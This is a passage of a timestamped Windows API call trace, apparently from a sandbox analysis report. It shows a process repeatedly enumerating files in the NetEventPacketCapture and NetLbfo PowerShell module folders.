ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.369] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.370] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0177.370] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.370] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.370] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.371] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20 [0177.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.374] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0177.374] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0177.374] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.376] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.376] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0177.376] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.377] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.377] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.377] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0177.377] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0177.377] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0177.378] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.378] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.378] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.379] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0177.379] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0177.379] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.380] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.380] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0177.380] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.380] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.381] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.382] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.382] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0177.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.383] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.383] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0177.383] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0177.383] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.384] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.384] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0177.384] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.384] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.384] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.385] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0177.385] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, 